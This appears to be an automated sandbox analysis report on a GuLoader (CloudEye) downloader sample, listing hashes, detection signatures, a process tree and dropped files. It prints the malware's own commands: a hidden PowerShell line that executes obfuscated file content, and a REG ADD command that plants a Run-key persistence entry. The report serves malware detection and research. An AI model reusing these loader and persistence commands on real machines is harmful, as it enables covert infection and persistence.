Analysis
-
max time kernel
152s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
24/04/2024, 01:00
Static task
static1
Behavioral task
behavioral1
Sample
6000507958.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
6000507958.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240412-en
General
-
Target
6000507958.exe
-
Size
563KB
-
MD5
e0d35d2fe887cbe0b4de87f1be7d7a17
-
SHA1
b37f59b0ec54d6c40645837dbb3a18c954346601
-
SHA256
1ae1583b2be5c21f228a0e925652c9f5013bddf699548ca39b02670576325010
-
SHA512
9d20fd479a57ccf51c02830744f095b5dfa98707777a8f24968aa0f0e9ac2a4de4ae348831a001b00cae9d750b9372a85248fdd15570a44ca52b90f8cf451256
-
SSDEEP
12288:8stfWr2z5t/dtpQBEd6XT9Pi8RzDm+EYRfT7d+:8st+r2z5J9Pd6XT9Pi85REYpT7d+
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Brookier.exe -
Loads dropped DLL 2 IoCs
pid Process 4248 6000507958.exe 2932 Brookier.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Unphosphatizeds = "%Recolours% -windowstyle minimized $Finpudsningen=(Get-ItemProperty -Path 'HKCU:\\Beakhead\\').Kejserrn;%Recolours% ($Finpudsningen)" reg.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\psiloses.lnk 6000507958.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2932 Brookier.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4104 powershell.exe 2932 Brookier.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4104 set thread context of 2932 4104 powershell.exe 103 PID 2932 set thread context of 3348 2932 Brookier.exe 57 PID 2932 set thread context of 3184 2932 Brookier.exe 107 PID 3184 set thread context of 3348 3184 cmd.exe 57 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 2 IoCs
resource yara_rule behavioral2/files/0x0008000000023260-51.dat nsis_installer_1 behavioral2/files/0x0008000000023260-51.dat nsis_installer_2 -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2228 reg.exe -
Suspicious behavior: EnumeratesProcesses 43 IoCs
pid Process 4104 powershell.exe 4104 powershell.exe 4104 powershell.exe 4104 powershell.exe 4104 powershell.exe 4104 powershell.exe 4104 powershell.exe 4104 powershell.exe 4104 powershell.exe 2932 Brookier.exe 2932 Brookier.exe 2932 Brookier.exe 2932 Brookier.exe 2932 Brookier.exe 2932 Brookier.exe 2932 Brookier.exe 2932 Brookier.exe 2932 Brookier.exe 2932 Brookier.exe 2932 Brookier.exe 2932 Brookier.exe 2932 Brookier.exe 2932 Brookier.exe 2932 Brookier.exe 2932 Brookier.exe 3184 cmd.exe 3184 cmd.exe 3184 cmd.exe 3184 cmd.exe 3184 cmd.exe 3184 cmd.exe 3184 cmd.exe 3184 cmd.exe 3184 cmd.exe 3184 cmd.exe 3184 cmd.exe 3184 cmd.exe 3184 cmd.exe 3184 cmd.exe 3184 cmd.exe 3184 cmd.exe 3184 cmd.exe 3184 cmd.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 4104 powershell.exe 2932 Brookier.exe 3348 Explorer.EXE 3348 Explorer.EXE 3184 cmd.exe 3184 cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4104 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4248 wrote to memory of 4104 4248 6000507958.exe 91 PID 4248 wrote to memory of 4104 4248 6000507958.exe 91 PID 4248 wrote to memory of 4104 4248 6000507958.exe 91 PID 4104 wrote to memory of 1592 4104 powershell.exe 93 PID 4104 wrote to memory of 1592 4104 powershell.exe 93 PID 4104 wrote to memory of 1592 4104 powershell.exe 93 PID 4104 wrote to memory of 2932 4104 powershell.exe 103 PID 4104 wrote to memory of 2932 4104 powershell.exe 103 PID 4104 wrote to memory of 2932 4104 powershell.exe 103 PID 4104 wrote to memory of 2932 4104 powershell.exe 103 PID 4104 wrote to memory of 2932 4104 powershell.exe 103 PID 2932 wrote to memory of 1652 2932 Brookier.exe 104 PID 2932 wrote to memory of 1652 2932 Brookier.exe 104 PID 2932 wrote to memory of 1652 2932 Brookier.exe 104 PID 1652 wrote to memory of 2228 1652 cmd.exe 106 PID 1652 wrote to memory of 2228 1652 cmd.exe 106 PID 1652 wrote to memory of 2228 1652 cmd.exe 106 PID 3348 wrote to memory of 3184 3348 Explorer.EXE 107 PID 3348 wrote to memory of 3184 3348 Explorer.EXE 107 PID 3348 wrote to memory of 3184 3348 Explorer.EXE 107
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3348 -
C:\Users\Admin\AppData\Local\Temp\6000507958.exe"C:\Users\Admin\AppData\Local\Temp\6000507958.exe"2⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Matines=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Moviedom230\Devenustate\Accorder\Uncoincidental\Incurvity.eft';$Intensities=$Matines.SubString(15241,3);.$Intensities($Matines)"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"4⤵PID:1592
-
-
C:\Users\Admin\AppData\Local\Temp\Brookier.exe"C:\Users\Admin\AppData\Local\Temp\Brookier.exe"4⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unphosphatizeds" /t REG_EXPAND_SZ /d "%Recolours% -windowstyle minimized $Finpudsningen=(Get-ItemProperty -Path 'HKCU:\Beakhead\').Kejserrn;%Recolours% ($Finpudsningen)"5⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unphosphatizeds" /t REG_EXPAND_SZ /d "%Recolours% -windowstyle minimized $Finpudsningen=(Get-ItemProperty -Path 'HKCU:\Beakhead\').Kejserrn;%Recolours% ($Finpudsningen)"6⤵
- Adds Run key to start application
- Modifies registry key
PID:2228
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4076 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:81⤵PID:5084
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
563KB
MD5e0d35d2fe887cbe0b4de87f1be7d7a17
SHA1b37f59b0ec54d6c40645837dbb3a18c954346601
SHA2561ae1583b2be5c21f228a0e925652c9f5013bddf699548ca39b02670576325010
SHA5129d20fd479a57ccf51c02830744f095b5dfa98707777a8f24968aa0f0e9ac2a4de4ae348831a001b00cae9d750b9372a85248fdd15570a44ca52b90f8cf451256
-
Filesize
76KB
MD5465454d4effb2dd4458e8032988455d0
SHA13afe548209cfe0721b65fbd2b4b6019354d0d59f
SHA25602e8b4c4053f7f4352c533a46471ab963a86a8156267cdffeb74c0374d2c4c79
SHA512c4a6031758908fe6b48046ab25f88a8983e63c95a6d94542a4e8812d172009f72020a842ee92f42742f15665eaed3e20cd6cf3cd2f166b7ceb2306ffbcceef3d
-
Filesize
336KB
MD53295c50e6679be9cda4405ea4aece7bb
SHA16361360fef5d23ee39c4ea42ea48d00e5952ad9a
SHA256698751c6b65fa692eace874966db90257c8166210c739be6d00a35053a30f2fa
SHA512b21f13cecb5c481ca1d951847a4b54881b37c868ada0d54b39d2e784a7fc8acac7d56be1063c2090a053400fe0f149b5450d5afa840153f234ff3f08770bdcf6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD55aa38904acdcc21a2fb8a1d30a72d92f
SHA1a9ce7d1456698921791db91347dba0489918d70c
SHA25610675f13abaee592f14382349aa35d82fb52aab4e27eef61d0c83dec1f6b73da
SHA512f04740da561d7cd0dea5e839c9e1c339d4a3e63944d3566c94c921a3d170a69918a32dff3f3b43f13d55cc25a2dbb4c21104f062c324308ac5104179766402a3